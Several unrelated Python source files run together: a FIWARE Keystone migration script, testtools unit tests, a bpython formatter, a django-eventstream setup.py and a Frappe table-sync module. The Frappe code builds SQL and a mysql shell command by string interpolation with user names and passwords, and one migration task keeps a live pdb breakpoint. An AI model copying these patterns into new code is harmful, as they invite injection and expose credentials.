grant_type='authorization_code', client_type='confidential', is_default=True) # Default Permissions and roles created_permissions = [] for permission in settings.INTERNAL_PERMISSIONS: old_id = MIGRATION_OLD_IDS.get(permission, uuid.uuid4().hex) created_permissions.append( keystone.fiware_roles.permissions.create( id=old_id, name=permission, application=idm_app, is_internal=True)) created_roles = [] for role in settings.INTERNAL_ROLES: old_id = MIGRATION_OLD_IDS.get(role, uuid.uuid4().hex) created_role = keystone.fiware_roles.roles.create( id=old_id, name=role, application=idm_app, is_internal=True) created_roles.append(created_role) # Link roles with permissions for index in settings.INTERNAL_ROLES[role]: keystone.fiware_roles.permissions.add_to_role( created_role, created_permissions[index]) print ('Created default fiware roles and permissions.') return idm_app instance = MigratePopulateTask() class MigrateCategoriesTask(PopulateTask): """Assignates a category to the old users.""" name = "user_categories" def run(self, keystone_path=settings.KEYSTONE_ROOT): __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) categories = json.load(open(os.path.join(__location__, 'categories.json'))) keystone = _admin_token_connection() self.trial_role = keystone.roles.find(name='trial') self.community_role = keystone.roles.find(name='community') self.basic_role = keystone.roles.find(name='basic') for data in categories: user_id = data['user_id'] role_id = data['role_id'] region_id = data.get('region_id', None) if (role_id == self.trial_role.id and not region_id): region_id = 'Spain2' if role_id == self.community_role.id and not region_id: print ('ERROR: {0} community with no region'.format(user_id)) continue if role_id == self.basic_role.id and region_id: region_id = None print ('WARNING: {0} basic with region, ignoring it'.format(user_id)) if role_id not in [self.trial_role.id, self.basic_role.id, self.community_role.id]: print ('ERROR: {0} invalid role_id {1}'.format(user_id, role_id)) continue self.update_account(keystone, user_id, role_id, region_id) def update_account(self, keystone, user_id, role_id, region_id=None): user = keystone.users.get(user_id) # grant the selected role keystone.roles.grant(user=user_id, role=role_id, domain='default') date = str(datetime.date.today()) if role_id == self.trial_role.id: keystone.users.update(user=user, trial_started_at=date) elif role_id == self.community_role.id: keystone.users.update(user=user, community_started_at=date) # cloud if role_id != self.basic_role.id: self._activate_cloud(keystone, user_id, user.cloud_project_id) # assign endpoint group for the selected region if not region_id: return endpoint_groups = keystone.endpoint_groups.list() region_group = next(group for group in endpoint_groups if group.filters.get('region_id', None) == region_id) if not region_group: print ('There is no endpoint group defined for {0}'.format(region_id)) keystone.endpoint_groups.add_endpoint_group_to_project( project=user.cloud_project_id, endpoint_group=region_group) # done! print ('OK: {0}'.format(user_id)) def _activate_cloud(self, keystone, user_id, cloud_project_id): # grant purchaser in cloud app to cloud org # and Member to the user keystone.fiware_roles.roles.add_to_organization( role=MIGRATION_OLD_IDS['purchaser'], organization=cloud_project_id, application=CLOUD_APP_ID) keystone.fiware_roles.roles.add_to_user( role=CLOUD_ROLE_ID, user=user_id, organization=cloud_project_id, application=CLOUD_APP_ID) instance2 = MigrateCategoriesTask() class AllRegionsForAllUsersTask(PopulateTask): """Assignates the no-filter endpoint group to all users""" name = "all_regions_to_all_users" def run(self, keystone_path=settings.KEYSTONE_ROOT): keystone = _admin_token_connection() all_users = keystone.users.list() for user in all_users: if not hasattr(user, 'cloud_project_id'): print 'Skip {0}, no cloud project id'.format(user.name) continue try: keystone.endpoint_groups.add_endpoint_group_to_project( project=user.cloud_project_id, endpoint_group=NO_FILTER_ENDPOINT_GROUP_ID) print '200 OK {0}'.format(user.name) except exceptions.Conflict: print '409 User {0} already has it'.format(user.name) except exceptions.NotFound: print '404 Not found project {0} for user {1}'.format( user.cloud_project_id, user.name) print 'Done.' instance3 = AllRegionsForAllUsersTask() class AssignDefaultProjectTask(PopulateTask): """Assigns a default project to a list of users defined in a file.""" name = "default_project_to_admins" def run(self, keystone_path=settings.KEYSTONE_ROOT): __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) admins = json.load(open(os.path.join(__location__, 'keystone_admins.json'))) keystone = _admin_token_connection() admin_project = keystone.projects.find(name='admin') import pdb; pdb.set_trace() for user_name in admins: user = keystone.users.find(name=user_name) res = keystone.users.update(user, default_project=admin_project) print user_name, res print 'Done.' instance4 = AssignDefaultProjectTask() class SetNameAsUsernameTask(PopulateTask): """Sets username to name to a list of users defined in a file.""" name = "set_username" def run(self, users_file): __location__ = os.path.realpath( os.path.join(os.getcwd(), os.path.dirname(__file__))) admins = json.load(open(os.path.join(__location__, users_file))) keystone = _admin_token_connection() for user_name in admins: user = keystone.users.find(name=user_name) res = keystone.users.update(user, username=user_name) print user_name, res print 'Done.' instance5 = SetNameAsUsernameTask()
# Copyright (c) 2008-2012 testtools developers. See LICENSE for details. import json import os import tempfile import unittest from testtools import TestCase from testtools.compat import ( _b, _u, BytesIO, StringIO, ) from testtools.content import ( attach_file, Content, content_from_file, content_from_stream, JSON, json_content, StackLinesContent, StacktraceContent, TracebackContent, text_content, ) from testtools.content_type import ( ContentType, UTF8_TEXT, ) from testtools.matchers import ( Equals, MatchesException, Raises, raises, ) from testtools.tests.helpers import an_exc_info raises_value_error = Raises(MatchesException(ValueError)) class TestContent(TestCase): def test___init___None_errors(self): self.assertThat(lambda: Content(None, None), raises_value_error) self.assertThat( lambda: Content(None, lambda: ["traceback"]), raises_value_error) self.assertThat( lambda: Content(ContentType("text", "traceback"), None), raises_value_error) def test___init___sets_ivars(self): content_type = ContentType("foo", "bar") content = Content(content_type, lambda: ["bytes"]) self.assertEqual(content_type, content.content_type) self.assertEqual(["bytes"], list(content.iter_bytes())) def test___eq__(self): content_type = ContentType("foo", "bar") one_chunk = lambda: [_b("bytes")] two_chunk = lambda: [_b("by"), _b("tes")] content1 = Content(content_type, one_chunk) content2 = Content(content_type, one_chunk) content3 = Content(content_type, two_chunk) content4 = Content(content_type, lambda: [_b("by"), _b("te")]) content5 = Content(ContentType("f", "b"), two_chunk) self.assertEqual(content1, content2) self.assertEqual(content1, content3) self.assertNotEqual(content1, content4) self.assertNotEqual(content1, content5) def test___repr__(self): content = Content(ContentType("application", "octet-stream"), lambda: [_b("\x00bin"), _b("ary\xff")]) self.assertIn("\\x00binary\\xff", repr(content)) def test_iter_text_not_text_errors(self): content_type = ContentType("foo", "bar") content = Content(content_type, lambda: ["bytes"]) self.assertThat(content.iter_text, raises_value_error) def test_iter_text_decodes(self): content_type = ContentType("text", "strange", {"charset": "utf8"}) content = Content( content_type, lambda: [_u("bytes\xea").encode("utf8")]) self.assertEqual([_u("bytes\xea")], list(content.iter_text())) def test_iter_text_default_charset_iso_8859_1(self): content_type = ContentType("text", "strange") text = _u("bytes\xea") iso_version = text.encode("ISO-8859-1") content = Content(content_type, lambda: [iso_version]) self.assertEqual([text], list(content.iter_text())) def test_as_text(self): content_type = ContentType("text", "strange", {"charset": "utf8"}) content = Content( content_type, lambda: [_u("bytes\xea").encode("utf8")]) self.assertEqual(_u("bytes\xea"), content.as_text()) def test_from_file(self): fd, path = tempfile.mkstemp() self.addCleanup(os.remove, path) os.write(fd, _b('some data')) os.close(fd) content = content_from_file(path, UTF8_TEXT, chunk_size=2) self.assertThat( list(content.iter_bytes()), Equals([_b('so'), _b('me'), _b(' d'), _b('at'), _b('a')])) def test_from_nonexistent_file(self): directory = tempfile.mkdtemp() nonexistent = os.path.join(directory, 'nonexistent-file') content = content_from_file(nonexistent) self.assertThat(content.iter_bytes, raises(IOError)) def test_from_file_default_type(self): content = content_from_file('/nonexistent/path') self.assertThat(content.content_type, Equals(UTF8_TEXT)) def test_from_file_eager_loading(self): fd, path = tempfile.mkstemp() os.write(fd, _b('some data')) os.close(fd) content = content_from_file(path, UTF8_TEXT, buffer_now=True) os.remove(path) self.assertThat( ''.join(content.iter_text()), Equals('some data')) def test_from_file_with_simple_seek(self): f = tempfile.NamedTemporaryFile() f.write(_b('some data')) f.flush() self.addCleanup(f.close) content = content_from_file( f.name, UTF8_TEXT, chunk_size=50, seek_offset=5) self.assertThat( list(content.iter_bytes()), Equals([_b('data')])) def test_from_file_with_whence_seek(self): f = tempfile.NamedTemporaryFile() f.write(_b('some data')) f.flush() self.addCleanup(f.close) content = content_from_file( f.name, UTF8_TEXT, chunk_size=50, seek_offset=-4, seek_whence=2) self.assertThat( list(content.iter_bytes()), Equals([_b('data')])) def test_from_stream(self): data = StringIO('some data') content = content_from_stream(data, UTF8_TEXT, chunk_size=2) self.assertThat( list(content.iter_bytes()), Equals(['so', 'me', ' d', 'at', 'a'])) def test_from_stream_default_type(self): data = StringIO('some data') content = content_from_stream(data) self.assertThat(content.content_type, Equals(UTF8_TEXT)) def test_from_stream_eager_loading(self): fd, path = tempfile.mkstemp() self.addCleanup(os.remove, path) self.addCleanup(os.close, fd) os.write(fd, _b('some data')) stream = open(path, 'rb') self.addCleanup(stream.close) content = content_from_stream(stream, UTF8_TEXT, buffer_now=True) os.write(fd, _b('more data')) self.assertThat( ''.join(content.iter_text()), Equals('some data')) def test_from_stream_with_simple_seek(self): data = BytesIO(_b('some data')) content = content_from_stream( data, UTF8_TEXT, chunk_size=50, seek_offset=5) self.assertThat( list(content.iter_bytes()), Equals([_b('data')])) def test_from_stream_with_whence_seek(self): data = BytesIO(_b('some data')) content = content_from_stream( data, UTF8_TEXT, chunk_size=50, seek_offset=-4, seek_whence=2) self.assertThat( list(content.iter_bytes()), Equals([_b('data')])) def test_from_text(self): data = _u("some data") expected = Content(UTF8_TEXT, lambda: [data.encode('utf8')]) self.assertEqual(expected, text_content(data)) def test_json_content(self): data = {'foo': 'bar'} expected = Content(JSON, lambda: [_b('{"foo": "bar"}')]) self.assertEqual(expected, json_content(data)) class TestStackLinesContent(TestCase): def _get_stack_line_and_expected_output(self): stack_lines = [ ('/path/to/file', 42, 'some_function', 'print("Hello World")'), ] expected = ' File "/path/to/file", line 42, in some_function\n' \ ' print("Hello World")\n' return stack_lines, expected def test_single_stack_line(self): stack_lines, expected = self._get_stack_line_and_expected_output() actual = StackLinesContent(stack_lines).as_text() self.assertEqual(expected, actual) def test_prefix_content(self): stack_lines, expected = self._get_stack_line_and_expected_output() prefix = self.getUniqueString() + '\n' content = StackLinesContent(stack_lines, prefix_content=prefix) actual = content.as_text() expected = prefix + expected self.assertEqual(expected, actual) def test_postfix_content(self): stack_lines, expected = self._get_stack_line_and_expected_output() postfix = '\n' + self.getUniqueString() content = StackLinesContent(stack_lines, postfix_content=postfix) actual = content.as_text() expected = expected + postfix self.assertEqual(expected, actual) def test___init___sets_content_type(self): stack_lines, expected = self._get_stack_line_and_expected_output() content = StackLinesContent(stack_lines) expected_content_type = ContentType("text", "x-traceback", {"language": "python", "charset": "utf8"}) self.assertEqual(expected_content_type, content.content_type) class TestTracebackContent(TestCase): def test___init___None_errors(self): self.assertThat( lambda: TracebackContent(None, None), raises_value_error) def test___init___sets_ivars(self): content = TracebackContent(an_exc_info, self) content_type = ContentType("text", "x-traceback", {"language": "python", "charset": "utf8"}) self.assertEqual(content_type, content.content_type) result = unittest.TestResult() expected = result._exc_info_to_string(an_exc_info, self) self.assertEqual(expected, ''.join(list(content.iter_text()))) class TestStacktraceContent(TestCase): def test___init___sets_ivars(self): content = StacktraceContent() content_type = ContentType("text", "x-traceback", {"language": "python", "charset": "utf8"}) self.assertEqual(content_type, content.content_type) def test_prefix_is_used(self): prefix = self.getUniqueString() actual = StacktraceContent(prefix_content=prefix).as_text() self.assertTrue(actual.startswith(prefix)) def test_postfix_is_used(self): postfix = self.getUniqueString() actual = StacktraceContent(postfix_content=postfix).as_text() self.assertTrue(actual.endswith(postfix)) def test_top_frame_is_skipped_when_no_stack_is_specified(self): actual = StacktraceContent().as_text() self.assertTrue('testtools/content.py' not in actual) class TestAttachFile(TestCase): def make_file(self, data): # GZ 2011-04-21: This helper could be useful for methods above trying # to use mkstemp, but should handle write failures and # always close the fd. There must be a better way. fd, path = tempfile.mkstemp() self.addCleanup(os.remove, path) os.write(fd, _b(data)) os.close(fd) return path def test_simple(self): class SomeTest(TestCase): def test_foo(self): pass test = SomeTest('test_foo') data = 'some data' path = self.make_file(data) my_content = text_content(data) attach_file(test, path, name='foo') self.assertEqual({'foo': my_content}, test.getDetails()) def test_optional_name(self): # If no name is provided, attach_file just uses the base name of the # file. class SomeTest(TestCase): def test_foo(self): pass test = SomeTest('test_foo') path = self.make_file('some data') base_path = os.path.basename(path) attach_file(test, path) self.assertEqual([base_path], list(test.getDetails())) def test_lazy_read(self): class SomeTest(TestCase): def test_foo(self): pass test = SomeTest('test_foo') path = self.make_file('some data') attach_file(test, path, name='foo', buffer_now=False) content = test.getDetails()['foo'] content_file = open(path, 'w') content_file.write('new data') content_file.close() self.assertEqual(''.join(content.iter_text()), 'new data') def test_eager_read_by_default(self): class SomeTest(TestCase): def test_foo(self): pass test = SomeTest('test_foo') path = self.make_file('some data') attach_file(test, path, name='foo') content = test.getDetails()['foo'] content_file = open(path, 'w') content_file.write('new data') content_file.close() self.assertEqual(''.join(content.iter_text()), 'some data') def test_suite(): from unittest import TestLoader return TestLoader().loadTestsFromName(__name__)
# The MIT License # # Copyright (c) 2008 Bob Farrell # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # A simple formatter for bpython to work with Pygments. # Pygments really kicks ass, it made it really easy to # get the exact behaviour I wanted, thanks Pygments.:) from pygments.formatter import Formatter from pygments.token import Keyword, Name, Comment, String, Error, \ Number, Operator, Token, Whitespace, Literal, Punctuation """These format strings are pretty ugly. \x01 represents a colour marker, which can be proceded by one or two of the following letters: k, r, g, y, b, m, c, w, d Which represent: blacK, Red, Green, Yellow, Blue, Magenta, Cyan, White, Default e.g. \x01y for yellow, \x01gb for green on blue background \x02 represents the bold attribute \x03 represents the start of the actual text that is output (in this case it's a %s for substitution) \x04 represents the end of the string; this is necessary because the strings are all joined together at the end so the parser needs them as delimeters """ Parenthesis = Token.Punctuation.Parenthesis theme_map = { Keyword: 'keyword', Name: 'name', Comment: 'comment', String: 'string', Literal: 'string', Error: 'error', Number: 'number', Token.Literal.Number.Float: 'number', Operator: 'operator', Punctuation: 'punctuation', Token: 'token', Whitespace: 'background', Parenthesis: 'paren', Parenthesis.UnderCursor: 'operator'} class BPythonFormatter(Formatter): """This is the custom formatter for bpython. Its format() method receives the tokensource and outfile params passed to it from the Pygments highlight() method and slops them into the appropriate format string as defined above, then writes to the outfile object the final formatted string. See the Pygments source for more info; it's pretty straightforward.""" def __init__(self, color_scheme, **options): self.f_strings = {} for k, v in theme_map.iteritems(): self.f_strings[k] = '\x01%s' % (color_scheme[v],) if k is Parenthesis: # FIXME: Find a way to make this the inverse of the current # background colour self.f_strings[k] += 'I' Formatter.__init__(self, **options) def format(self, tokensource, outfile): o = '' for token, text in tokensource: if text == '\n': continue while token not in self.f_strings: token = token.parent o += "%s\x03%s\x04" % (self.f_strings[token], text) outfile.write(o.rstrip()) # vim: sw=4 ts=4 sts=4 ai et
import os from setuptools import setup with open(os.path.join(os.path.dirname(__file__), 'README.md')) as f: readme = f.read() install_requires = [] install_requires.extend(['PyJWT>=1.5,<3', 'gripcontrol>=4.0,<5', 'django_grip>=3.0,<4', 'Werkzeug>=0.12,<1', 'six>=1.10,<2']) setup( name='django-eventstream', version='4.2.0', description='Server-Sent Events for Django', long_description=readme, long_description_content_type='text/markdown', author='Justin Karneges', author_email='[email protected]', url='https://github.com/fanout/django-eventstream', license='MIT', zip_safe=False, packages=['django_eventstream', 'django_eventstream.migrations', 'django_eventstream.management', 'django_eventstream.management.commands'], package_data={'django_eventstream': ['static/django_eventstream/*']}, install_requires=install_requires, tests_require=['Django>=2.0'], test_suite='tests.runtests.runtests', classifiers=[ 'Development Status :: 4 - Beta', 'Topic :: Utilities', 'License :: OSI Approved :: MIT License', 'Programming Language :: Python', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 3', 'Framework :: Django', ] )
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # MIT License. See license.txt from __future__ import unicode_literals """ Syncs a database table to the `DocType` (metadata) .. note:: This module is only used internally """ import re import os import frappe from frappe import _ from frappe.utils import cstr, cint, flt # imports - third-party imports import pymysql from pymysql.constants import ER class InvalidColumnName(frappe.ValidationError): pass varchar_len = '140' standard_varchar_columns = ('name', 'owner', 'modified_by', 'parent', 'parentfield', 'parenttype') type_map = { 'Currency': ('decimal', '18,6') ,'Int': ('int', '11') ,'Float': ('decimal', '18,6') ,'Percent': ('decimal', '18,6') ,'Check': ('int', '1') ,'Small Text': ('text', '') ,'Long Text': ('longtext', '') ,'Code': ('longtext', '') ,'Text Editor': ('longtext', '') ,'Date': ('date', '') ,'Datetime': ('datetime', '6') ,'Time': ('time', '6') ,'Text': ('text', '') ,'Data': ('varchar', varchar_len) ,'Link': ('varchar', varchar_len) ,'Dynamic Link': ('varchar', varchar_len) ,'Password': ('varchar', varchar_len) ,'Select': ('varchar', varchar_len) ,'Read Only': ('varchar', varchar_len) ,'Attach': ('text', '') ,'Attach Image': ('text', '') ,'Signature': ('longtext', '') ,'Color': ('varchar', varchar_len) ,'Barcode': ('longtext', '') ,'Geolocation': ('longtext', '') } default_columns = ['name', 'creation', 'modified', 'modified_by', 'owner', 'docstatus', 'parent', 'parentfield', 'parenttype', 'idx'] optional_columns = ["_user_tags", "_comments", "_assign", "_liked_by"] default_shortcuts = ['_Login', '__user', '_Full Name', 'Today', '__today', "now", "Now"] def updatedb(dt, meta=None): """ Syncs a `DocType` to the table * creates if required * updates columns * updates indices """ res = frappe.db.sql("select issingle from tabDocType where name=%s", (dt,)) if not res: raise Exception('Wrong doctype "%s" in updatedb' % dt) if not res[0][0]: tab = DbTable(dt, 'tab', meta) tab.validate() frappe.db.commit() tab.sync() frappe.db.begin() class DbTable: def __init__(self, doctype, prefix = 'tab', meta = None): self.doctype = doctype self.name = prefix + doctype self.columns = {} self.current_columns = {} self.meta = meta if not self.meta: self.meta = frappe.get_meta(self.doctype) # lists for change self.add_column = [] self.change_type = [] self.add_index = [] self.drop_index = [] self.set_default = [] # load self.get_columns_from_docfields() def validate(self): """Check if change in varchar length isn't truncating the columns""" if self.is_new(): return self.get_columns_from_db() columns = [frappe._dict({"fieldname": f, "fieldtype": "Data"}) for f in standard_varchar_columns] columns += self.columns.values() for col in columns: if len(col.fieldname) >= 64: frappe.throw(_("Fieldname is limited to 64 characters ({0})").format(frappe.bold(col.fieldname))) if col.fieldtype in type_map and type_map[col.fieldtype][0]=="varchar": # validate length range new_length = cint(col.length) or cint(varchar_len) if not (1 <= new_length <= 1000): frappe.throw(_("Length of {0} should be between 1 and 1000").format(col.fieldname)) try: # check for truncation max_length = frappe.db.sql("""select max(char_length(`{fieldname}`)) from `tab{doctype}`"""\ .format(fieldname=col.fieldname, doctype=self.doctype)) except pymysql.InternalError as e: if e.args[0] == ER.BAD_FIELD_ERROR: # Unknown column 'column_name' in 'field list' continue else: raise if max_length and max_length[0][0] and max_length[0][0] > new_length: current_type = self.current_columns[col.fieldname]["type"] current_length = re.findall('varchar\(([\d]+)\)', current_type) if not current_length: # case when the field is no longer a varchar continue current_length = current_length[0] if col.fieldname in self.columns: self.columns[col.fieldname].length = current_length frappe.msgprint(_("Reverting length to {0} for '{1}' in '{2}'; Setting the length as {3} will cause truncation of data.")\ .format(current_length, col.fieldname, self.doctype, new_length)) def sync(self): if self.is_new(): self.create() else: self.alter() def is_new(self): return self.name not in DbManager(frappe.db).get_tables_list(frappe.db.cur_db_name) def create(self): add_text = '' # columns column_defs = self.get_column_definitions() if column_defs: add_text += ',\n'.join(column_defs) + ',\n' # index index_defs = self.get_index_definitions() if index_defs: add_text += ',\n'.join(index_defs) + ',\n' # create table frappe.db.sql("""create table `%s` ( name varchar({varchar_len}) not null primary key, creation datetime(6), modified datetime(6), modified_by varchar({varchar_len}), owner varchar({varchar_len}), docstatus int(1) not null default '0', parent varchar({varchar_len}), parentfield varchar({varchar_len}), parenttype varchar({varchar_len}), idx int(8) not null default '0', %sindex parent(parent)) ENGINE={engine} ROW_FORMAT=COMPRESSED CHARACTER SET=utf8mb4 COLLATE=utf8mb4_unicode_ci""".format(varchar_len=varchar_len, engine=self.meta.get("engine") or 'InnoDB') % (self.name, add_text)) def get_column_definitions(self): column_list = [] + default_columns ret = [] for k in self.columns.keys(): if k not in column_list: d = self.columns[k].get_definition() if d: ret.append('`'+ k+ '` ' + d) column_list.append(k) return ret def get_index_definitions(self): ret = [] for key, col in self.columns.items(): if col.set_index and not col.unique and col.fieldtype in type_map and \ type_map.get(col.fieldtype)[0] not in ('text', 'longtext'): ret.append('index `' + key + '`(`' + key + '`)') return ret def get_columns_from_docfields(self): """ get columns from docfields and custom fields """ fl = frappe.db.sql("SELECT * FROM tabDocField WHERE parent = %s", self.doctype, as_dict = 1) lengths = {} precisions = {} uniques = {} # optional fields like _comments if not self.meta.istable: for fieldname in optional_columns: fl.append({ "fieldname": fieldname, "fieldtype": "Text" }) # add _seen column if track_seen if getattr(self.meta, 'track_seen', False): fl.append({ 'fieldname': '_seen', 'fieldtype': 'Text' }) if not frappe.flags.in_install_db and frappe.flags.in_install != "frappe": custom_fl = frappe.db.sql("""\ SELECT * FROM `tabCustom Field` WHERE dt = %s AND docstatus < 2""", (self.doctype,), as_dict=1) if custom_fl: fl += custom_fl # apply length, precision and unique from property setters for ps in frappe.get_all("Property Setter", fields=["field_name", "property", "value"], filters={ "doc_type": self.doctype, "doctype_or_field": "DocField", "property": ["in", ["precision", "length", "unique"]] }): if ps.property=="length": lengths[ps.field_name] = cint(ps.value) elif ps.property=="precision": precisions[ps.field_name] = cint(ps.value) elif ps.property=="unique": uniques[ps.field_name] = cint(ps.value) for f in fl: self.columns[f['fieldname']] = DbColumn(self, f['fieldname'], f['fieldtype'], lengths.get(f["fieldname"]) or f.get('length'), f.get('default'), f.get('search_index'), f.get('options'), uniques.get(f["fieldname"], f.get('unique')), precisions.get(f['fieldname']) or f.get('precision')) def get_columns_from_db(self): self.show_columns = frappe.db.sql("desc `%s`" % self.name) for c in self.show_columns: self.current_columns[c[0].lower()] = {'name': c[0], 'type':c[1], 'index':c[3]=="MUL", 'default':c[4], "unique":c[3]=="UNI"} # GET foreign keys def get_foreign_keys(self): fk_list = [] txt = frappe.db.sql("show create table `%s`" % self.name)[0][1] for line in txt.split('\n'): if line.strip().startswith('CONSTRAINT') and line.find('FOREIGN')!=-1: try: fk_list.append((line.split('`')[3], line.split('`')[1])) except IndexError: pass return fk_list # Drop foreign keys def drop_foreign_keys(self): if not self.drop_foreign_key: return fk_list = self.get_foreign_keys() # make dictionary of constraint names fk_dict = {} for f in fk_list: fk_dict[f[0]] = f[1] # drop for col in self.drop_foreign_key: frappe.db.sql("set foreign_key_checks=0") frappe.db.sql("alter table `%s` drop foreign key `%s`" % (self.name, fk_dict[col.fieldname])) frappe.db.sql("set foreign_key_checks=1") def alter(self): for col in self.columns.values(): col.build_for_alter_table(self.current_columns.get(col.fieldname.lower(), None)) query = [] for col in self.add_column: query.append("add column `{}` {}".format(col.fieldname, col.get_definition())) for col in self.change_type: current_def = self.current_columns.get(col.fieldname.lower(), None) query.append("change `{}` `{}` {}".format(current_def["name"], col.fieldname, col.get_definition())) for col in self.add_index: # if index key not exists if not frappe.db.sql("show index from `%s` where key_name = %s" % (self.name, '%s'), col.fieldname): query.append("add index `{}`(`{}`)".format(col.fieldname, col.fieldname)) for col in self.drop_index: if col.fieldname != 'name': # primary key # if index key exists if frappe.db.sql("""show index from `{0}` where key_name=%s and Non_unique=%s""".format(self.name), (col.fieldname, col.unique)): query.append("drop index `{}`".format(col.fieldname)) for col in self.set_default: if col.fieldname=="name": continue if col.fieldtype in ("Check", "Int"): col_default = cint(col.default) elif col.fieldtype in ("Currency", "Float", "Percent"): col_default = flt(col.default) elif not col.default: col_default = "null" else: col_default = '"{}"'.format(col.default.replace('"', '\\"')) query.append('alter column `{}` set default {}'.format(col.fieldname, col_default)) if query: try: frappe.db.sql("alter table `{}` {}".format(self.name, ", ".join(query))) except Exception as e: # sanitize if e.args[0]==1060: frappe.throw(str(e)) elif e.args[0]==1062: fieldname = str(e).split("'")[-2] frappe.throw(_("{0} field cannot be set as unique in {1}, as there are non-unique existing values".format(fieldname, self.name))) else: raise e class DbColumn: def __init__(self, table, fieldname, fieldtype, length, default, set_index, options, unique, precision): self.table = table self.fieldname = fieldname self.fieldtype = fieldtype self.length = length self.set_index = set_index self.default = default self.options = options self.unique = unique self.precision = precision def get_definition(self, with_default=1): column_def = get_definition(self.fieldtype, precision=self.precision, length=self.length) if not column_def: return column_def if self.fieldtype in ("Check", "Int"): default_value = cint(self.default) or 0 column_def += ' not null default {0}'.format(default_value) elif self.fieldtype in ("Currency", "Float", "Percent"): default_value = flt(self.default) or 0 column_def += ' not null default {0}'.format(default_value) elif self.default and (self.default not in default_shortcuts) \ and not self.default.startswith(":") and column_def not in ('text', 'longtext'): column_def += ' default "' + self.default.replace('"', '\"') + '"' if self.unique and (column_def not in ('text', 'longtext')): column_def += ' unique' return column_def def build_for_alter_table(self, current_def): column_def = get_definition(self.fieldtype, self.precision, self.length) # no columns if not column_def: return # to add? if not current_def: self.fieldname = validate_column_name(self.fieldname) self.table.add_column.append(self) return # type if (current_def['type'] != column_def) or\ self.fieldname != current_def['name'] or\ ((self.unique and not current_def['unique']) and column_def not in ('text', 'longtext')): self.table.change_type.append(self) else: # default if (self.default_changed(current_def) \ and (self.default not in default_shortcuts) \ and not cstr(self.default).startswith(":") \ and not (column_def in ['text','longtext'])): self.table.set_default.append(self) # index should be applied or dropped irrespective of type change if ( (current_def['index'] and not self.set_index and not self.unique) or (current_def['unique'] and not self.unique) ): # to drop unique you have to drop index self.table.drop_index.append(self) elif (not current_def['index'] and self.set_index) and not (column_def in ('text', 'longtext')): self.table.add_index.append(self) def default_changed(self, current_def): if "decimal" in current_def['type']: return self.default_changed_for_decimal(current_def) else: return current_def['default'] != self.default def default_changed_for_decimal(self, current_def): try: if current_def['default'] in ("", None) and self.default in ("", None): # both none, empty return False elif current_def['default'] in ("", None): try: # check if new default value is valid float(self.default) return True except ValueError: return False elif self.default in ("", None): # new default value is empty return True else: # NOTE float() raise ValueError when "" or None is passed return float(current_def['default'])!=float(self.default) except TypeError: return True class DbManager: """ Basically, a wrapper for oft-used mysql commands. like show tables,databases, variables etc... #TODO: 0. Simplify / create settings for the restore database source folder 0a. Merge restore database and extract_sql(from frappe_server_tools). 1. Setter and getter for different mysql variables. 2. Setter and getter for mysql variables at global level?? """ def __init__(self,db): """ Pass root_conn here for access to all databases. """ if db: self.db = db def get_current_host(self): return self.db.sql("select user()")[0][0].split('@')[1] def get_variables(self,regex): """ Get variables that match the passed pattern regex """ return list(self.db.sql("SHOW VARIABLES LIKE '%s'"%regex)) def get_table_schema(self,table): """ Just returns the output of Desc tables. """ return list(self.db.sql("DESC `%s`"%table)) def get_tables_list(self,target=None): """get list of tables""" if target: self.db.use(target) return [t[0] for t in self.db.sql("SHOW TABLES")] def create_user(self, user, password, host=None): #Create user if it doesn't exist. if not host: host = self.get_current_host() if password: self.db.sql("CREATE USER '%s'@'%s' IDENTIFIED BY '%s';" % (user[:16], host, password)) else: self.db.sql("CREATE USER '%s'@'%s';" % (user[:16], host)) def delete_user(self, target, host=None): if not host: host = self.get_current_host() try: self.db.sql("DROP USER '%s'@'%s';" % (target, host)) except Exception as e: if e.args[0]==1396: pass else: raise def create_database(self,target): if target in self.get_database_list(): self.drop_database(target) self.db.sql("CREATE DATABASE `%s` ;" % target) def drop_database(self,target): self.db.sql("DROP DATABASE IF EXISTS `%s`;"%target) def grant_all_privileges(self, target, user, host=None): if not host: host = self.get_current_host() self.db.sql("GRANT ALL PRIVILEGES ON `%s`.* TO '%s'@'%s';" % (target, user, host)) def grant_select_privilges(self, db, table, user, host=None): if not host: host = self.get_current_host() if table: self.db.sql("GRANT SELECT ON %s.%s to '%s'@'%s';" % (db, table, user, host)) else: self.db.sql("GRANT SELECT ON %s.* to '%s'@'%s';" % (db, user, host)) def flush_privileges(self): self.db.sql("FLUSH PRIVILEGES") def get_database_list(self): """get list of databases""" return [d[0] for d in self.db.sql("SHOW DATABASES")] def restore_database(self,target,source,user,password): from frappe.utils import make_esc esc = make_esc('$ ') os.system("mysql -u %s -p%s -h%s %s < %s" % \ (esc(user), esc(password), esc(frappe.db.host), esc(target), source)) def drop_table(self,table_name): """drop table if exists""" if not table_name in self.get_tables_list(): return self.db.sql("DROP TABLE IF EXISTS %s "%(table_name)) def validate_column_name(n): n = n.replace(' ','_').strip().lower() special_characters = re.findall("[\W]", n, re.UNICODE) if special_characters: special_characters = ", ".join('"{0}"'.format(c) for c in special_characters) frappe.throw(_("Fieldname {0} cannot have special characters like {1}").format(cstr(n), special_characters), InvalidColumnName) return n def validate_column_length(fieldname): """ In MySQL maximum column length is 64 characters, ref: https://dev.mysql.com/doc/refman/5.5/en/identifiers.html""" if len(fieldname) > 64: frappe.throw(_("Fieldname is limited to 64 characters ({0})").format(fieldname)) def remove_all_foreign_keys(): frappe.db.sql("set foreign_key_checks = 0") 